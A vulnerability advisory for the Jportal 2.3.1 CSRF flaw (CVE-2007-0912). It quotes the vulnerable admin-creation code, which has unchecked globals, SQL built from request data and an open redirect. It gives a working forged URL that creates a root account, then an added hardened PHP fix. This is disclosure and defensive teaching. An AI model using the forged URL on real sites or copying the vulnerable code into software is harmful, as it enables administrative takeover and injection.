Jportal 'admin.adm.php' Cross-Site Request Forgery Vulnerability

Vulnerability ID: 1191701    Vulnerability type: Cross-site request forgery
Published: 2007-02-13    Updated: 2007-02-13
CVE ID: CVE-2007-0912    CNNVD-ID: CNNVD-200702-271
Platform: N/A    CVSS score: 9.3
|Sources
https://www.securityfocus.com/bid/86608
https://cxsecurity.com/issue/WLB-2007020042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-271
|Details
Jportal 2.3.1, and possibly earlier versions, contains a cross-site request forgery vulnerability in the script admin/admin.adm.php. A remote attacker can perform privileged operations by tricking a logged-in administrator into visiting a crafted URL for admin/admin.adm.php.
|Exploit
Type: CSRF Attack / Input Validation Error
Remote: Yes
Version: 2.3.1 (very possibly older versions are vulnerable too)
Problem is in admin/admin.adm.php:

function add_admin() {

    // every input is pulled from the global scope (register_globals style):
    // nothing distinguishes a form submission from a forged request
    global $name, $mail, $nick_, $action, $user_tbl, $access;
    global $nick, $PHP_SELF, $_pass, $pass_, $acce, $op, $goto;

    if($access=='root') {

        if($_pass==$pass_) {

            // bare keys (news, art, ...) rely on PHP's old unquoted-string fallback
            if($acce[news]=='') $acce[news]='n';
            if($acce[info]=='') $acce[info]='n';
            if($acce[art]=='') $acce[art]='n';
            if($acce[sonda]=='') $acce[sonda]='n';
            if($acce[link]=='') $acce[link]='n';
            if($acce[forum]=='') $acce[forum]='n';
            if($acce[comm]=='') $acce[comm]='n';
            if($acce[menu]=='') $acce[menu]='n';
            if($acce[bann]=='') $acce[bann]='n';
            if($acce[topic]=='') $acce[topic]='n';
            if($acce[file]=='') $acce[file]='n';

            if($acce[root]<>'t') {

                $acce_ = $acce[news].'-'.$acce[art].'-'.$acce[info].'-'.$acce[sonda].'-'.$acce[link].'-'.$acce[forum].'-'.$acce[comm].'-'.$acce[file].'-'.$acce[menu].'-'.$acce[bann].'-'.$acce[topic];

            } else {

                $acce_ = 'root';

            }

            // request data is interpolated straight into the SQL string
            $query = "INSERT INTO $user_tbl VALUES(NULL, '$nick_', '".md5($_pass)."', '$name', now(), '$acce_', '$mail', 1)";
            $result = mysql_query($query);

            // log message is Polish: "administrator added (ID ...)"
            add_log('dodano administratora (ID '.mysql_insert_id().')');

            if($goto=='')
                header("Location: admin.php?op=$op");
            else
                header("Location: $goto");
            exit;

        } // end if($_pass==$pass_)  (closing braces below were cut from the original post)
    } // end if($access=='root')
} // end add_admin()

As we can see, all variables come from "nowhere" (i.e. they can come from POST, GET, even COOKIE), and it is not checked whether the script was launched by the admin through the admin panel or not. Due to this fact, if the admin has logged in and not logged out, and we let him send a prepared request, we can get a root account (for example, using our profile avatar).

http://vulnerable_jportal/admin.php?op=admin&name=admin&mail=&nick_=admin&_pass=pass&pass_=haslo&acce%5Broot%5D=t&ok=dodaj&goto=&cmd=add

gives us root account with name "admin" and password "pass".

Dżitu
dzitu (at) poczta (dot) fm [email concealed]
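The two defects the post describes are that add_admin() trusts request variables for both its inputs and its authorisation state, and that nothing ties the request to a form the administrator actually submitted. The following hardened handler is an added example written for this page; it is not Jportal code. It assumes a PHP 7.4+ runtime with PDO, that the administrator's privilege level is kept server-side in $_SESSION['access'] (an assumed session key), and that $user_tbl is a server-side configuration value. The helper add_log() is a stand-in for the project's own logging function, and the field names mirror those in the vulnerable excerpt.

```php
<?php
// Added example (not Jportal's code): a CSRF-resistant add_admin().
// Assumed: PHP 7.4+, PDO, $_SESSION['access'] holds the server-side role,
// $user_tbl is configuration (never request data).
declare(strict_types=1);

session_start();

// Stand-in for the project's add_log(): writes to the PHP error log.
function add_log(string $msg): void
{
    error_log('[admin] ' . $msg);
}

// Issue one random token per session; the admin form embeds it as a hidden
// field named csrf_token (constructed name).
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session copy.
// A forged cross-site request cannot read the victim's session-bound value.
function csrf_check(?string $submitted): bool
{
    return isset($_SESSION['csrf_token'])
        && is_string($submitted)
        && hash_equals($_SESSION['csrf_token'], $submitted);
}

function add_admin(PDO $db, string $user_tbl): void
{
    // Reject anything that is not a POST carrying a valid token. A crafted
    // link or image URL produces a GET with no token, so it stops here.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request');
    }

    // Authorisation comes from the session, not from a request variable
    // named $access as in the original (register_globals-style input).
    if (($_SESSION['access'] ?? '') !== 'root') {
        http_response_code(403);
        exit('Forbidden');
    }

    // Read inputs explicitly from $_POST instead of the global scope.
    $nick  = trim((string)($_POST['nick_'] ?? ''));
    $name  = trim((string)($_POST['name'] ?? ''));
    $mail  = trim((string)($_POST['mail'] ?? ''));
    $pass  = (string)($_POST['_pass'] ?? '');
    $pass2 = (string)($_POST['pass_'] ?? '');
    $acce  = is_array($_POST['acce'] ?? null) ? $_POST['acce'] : [];

    if ($nick === '' || $pass === '' || !hash_equals($pass, $pass2)) {
        http_response_code(400);
        exit('Bad input');
    }

    // Same access-string layout as the original (module flags joined by '-'),
    // but each flag is whitelisted to 't' or 'n' rather than copied verbatim.
    $modules = ['news', 'art', 'info', 'sonda', 'link', 'forum',
                'comm', 'file', 'menu', 'bann', 'topic'];
    if (($acce['root'] ?? '') === 't') {
        $acce_ = 'root';
    } else {
        $flags = [];
        foreach ($modules as $m) {
            $flags[] = (($acce[$m] ?? 'n') === 't') ? 't' : 'n';
        }
        $acce_ = implode('-', $flags);
    }

    // Prepared statement: request data is bound, never interpolated. The
    // table name cannot be bound, so it must come from trusted configuration.
    // password_hash() replaces the unsalted md5() of the original.
    $sql = "INSERT INTO $user_tbl VALUES (NULL, :nick, :hash, :name, NOW(), :acce, :mail, 1)";
    $stmt = $db->prepare($sql);
    $stmt->execute([
        ':nick' => $nick,
        ':hash' => password_hash($pass, PASSWORD_DEFAULT),
        ':name' => $name,
        ':acce' => $acce_,
        ':mail' => $mail,
    ]);

    add_log('administrator added (ID ' . $db->lastInsertId() . ')');

    // Fixed redirect target: the user-controlled $goto of the original is gone.
    header('Location: admin.php?op=admin');
    exit;
}
```

The form that posts to this handler must include `<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">`; without it the token check fails closed. Setting the session cookie with SameSite=Lax (or Strict) adds a second, browser-enforced layer against the same class of forged request, and dropping the `$goto` redirect removes the open-redirect side effect visible in the original excerpt.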
|Affected products
JPortal Jportal Web Server 2.3.1
|References

Source: BUGTRAQ
Name: 20070211 Jportal 2.3.1 CSRF vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/459827/100/0/threaded
Source: OSVDB
Name: 33712
Link: http://osvdb.org/33712
Source: XF
Name: jportal-admin-csrf(32458)
Link: http://xforce.iss.net/xforce/xfdb/32458
Source: SREASON
Name: 2239
Link: http://securityreason.com/securityalert/2239